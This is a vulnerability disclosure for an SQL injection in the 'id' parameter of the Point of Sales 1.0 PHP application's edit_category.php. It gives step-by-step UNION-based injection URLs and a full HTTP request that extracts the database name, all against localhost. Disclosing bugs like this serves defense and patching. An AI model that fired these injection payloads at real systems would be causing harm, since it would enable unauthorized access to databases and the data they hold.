Point of Sales 1.0 id SQL Injection

2020.10.26

Ankita Pal (IN)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#Exploit Title: Point of Sales 1.0 - SQL Injection
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4
Proof of Concept:::
Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1
Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1'
Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+
Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+
Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+
Malicious Request:::
GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1
Gives database name *sourcecodester_posdb*

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Point of Sales 1.0 id SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.